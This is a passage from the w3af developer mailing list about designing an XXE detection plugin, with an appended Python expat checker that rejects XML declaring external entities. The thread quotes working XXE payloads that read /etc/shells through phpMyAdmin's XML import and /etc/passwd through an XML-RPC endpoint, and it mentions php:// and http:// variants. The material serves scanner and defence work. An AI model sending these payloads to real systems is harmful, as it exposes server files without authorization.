Hi, list.

The latest case I had was an XXE in PHPMyAdmin, which allowed reading files after export with a specially crafted *.xml file, and the exploit looked like this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ficheiro [
<!ENTITY xxe SYSTEM "file:///etc/shells" >
]>
<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
    <pma:structure_schemas>
        <pma:database name="test" collation="utf8_general_ci" charset="utf8">
            <pma:table name="test_tbl">
                CREATE TABLE `test_tbl` (`file` varchar(20000) NOT NULL);
            </pma:table>
        </pma:database>
    </pma:structure_schemas>
    <database name="test">
        <table name="test_tbl">
            <column name="file">&xxe;</column>
        </table>
    </database>
</pma_xml_export>

I think it is not at all obvious how to implement detection of such things in audit plugins, due to the logic of outputting the result in a table.

Andres, you wrote:

> So our audit plugin should send the xml with the external entity as the
> post-data to all URLs?

I think this way can be used only in a small number of cases, where the content of the files is echoed right on the same page which processed the *.xml. Also, I think there have to be at least 2 checks: the first one for reading a local file and another one for trying to use some protocols, http for example, instead of file:///. Apart from this, I think that first (before checking direct file:///) we must check the possibility of reading a file using the php:// wrapper and base64 conversion. So I think the checking process must be implemented, at a minimum, not only for file:///.

-----Original Message-----
From: Andres Riancho [mailto:andres.rian...@gmail.com]
Sent: Tuesday, August 28, 2012 12:14 AM
To: w3af-us...@lists.sourceforge.net; w3af-develop@lists.sourceforge.net; Carlos Pantelides; Achim Hoffmann; Taras P. Ivashchenko
Subject: [W3af-develop] Xml eXternal Entity

Lists,

I've been playing around with the idea of writing an XXE [0] detection plugin for w3af all evening, but I can't really decide if it is worth it. Have you guys seen these types of vulnerabilities in the wild? If so, how?
Most of the public vulnerabilities I see are exploited in this form:

"""
POST /xmlrpc_server.php HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
"""

Which basically means that the vulnerable source code looks like:

"""
<?
...
$xml = simplexml_load_file("php://input");
...
echo $some_part_of_the_xml;
?>
"""

So our audit plugin should send the xml with the external entity as the post-data to all URLs? I can't find a realistic example where it would make sense to send the custom-xml to one of these:

- Query string parameter: http://host/index.aspx?id=<?xml...>
- HTML Form with url-encoding: http://host/index.aspx with post-data name=<?xml...>&lastname=doe&age=32
- HTML Form with file input, where the uploaded file contains the XML (could... maybe work in some cases... but most likely the /etc/passwd file won't be echoed back in the response).

What do you think? Ideas?

[0] https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OWASP-DV-008%29

Regards,
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats.
http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
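Added example (not code from this thread, from w3af or from phpMyAdmin): the receiving side of the same problem. Both posters note that a scanner only sees the XXE when the file content is echoed back, and that checks limited to file:/// miss php:// and http:// variants. An application or gateway that parses untrusted XML can instead flag any external entity declaration before the document reaches the real parser, whatever the URI scheme. The example below uses only the Python standard library (xml.parsers.expat) and never fetches the referenced URI: the ExternalEntityRefHandler records the attempt and returns 1, which tells expat the reference was handled. The sample documents are constructed for this example; the first reuses the phpMyAdmin export shape from the thread.

```python
import xml.parsers.expat
from urllib.parse import urlsplit


def find_external_entities(xml_text):
    """Report external entity declarations and dereferences in XML_TEXT.

    Nothing is fetched: the reference handler just logs the system id and
    tells expat the reference was handled, so file://, php:// and http://
    URIs are recorded but never opened.
    """
    declared = []    # external entity declarations seen in the DTD
    referenced = []  # system ids the document actually tried to expand
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities (<!ENTITY a "x">) carry a value; a SYSTEM or
        # PUBLIC identifier marks an external one, which is what XXE relies on.
        if system_id is not None or public_id is not None:
            scheme = urlsplit(system_id or "").scheme or "relative"
            declared.append({
                "name": name,
                "system_id": system_id,
                "scheme": scheme,
                "parameter": bool(is_param),
            })

    def on_external_ref(context, base, system_id, public_id):
        referenced.append(system_id)
        return 1  # handled: expat substitutes nothing and fetches nothing

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    error = None
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError as exc:
        error = str(exc)
    return {
        "external_entities": declared,
        "referenced": referenced,
        "schemes": sorted({d["scheme"] for d in declared}),
        "parse_error": error,
    }


def should_reject(report):
    """Policy: refuse any document that declares an external entity at all,
    regardless of scheme, rather than enumerating known-bad wrappers."""
    return bool(report["external_entities"])


# Constructed sample inputs (not captured traffic).
PMA_FILE_ENTITY = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE ficheiro [ <!ENTITY xxe SYSTEM "file:///etc/shells"> ]>\n'
    '<pma_xml_export version="1.0">\n'
    '  <database name="test"><table name="test_tbl">'
    '<column name="file">&xxe;</column></table></database>\n'
    '</pma_xml_export>\n'
)
PHP_WRAPPER_ENTITY = (
    '<!DOCTYPE d [ <!ENTITY xxe SYSTEM '
    '"php://filter/convert.base64-encode/resource=/etc/shells"> ]>\n'
    '<d>&xxe;</d>\n'
)
HTTP_ENTITY = (
    '<!DOCTYPE d [ <!ENTITY xxe SYSTEM "http://example.invalid/x"> ]>\n'
    '<d>&xxe;</d>\n'
)
BENIGN_INTERNAL_ENTITY = (
    '<!DOCTYPE d [ <!ENTITY greet "hello"> ]>\n'
    '<d>&greet;</d>\n'
)

if __name__ == "__main__":
    for label, doc in [("pma", PMA_FILE_ENTITY), ("php", PHP_WRAPPER_ENTITY),
                       ("http", HTTP_ENTITY), ("benign", BENIGN_INTERNAL_ENTITY)]:
        report = find_external_entities(doc)
        print(label, "reject" if should_reject(report) else "allow", report["schemes"])
```

The pre-check is scheme-agnostic on purpose: the php:// wrapper and http:// cases from the thread are caught by the same declaration test as file:///, and a document whose DTD declares no external entities (internal entities only) passes.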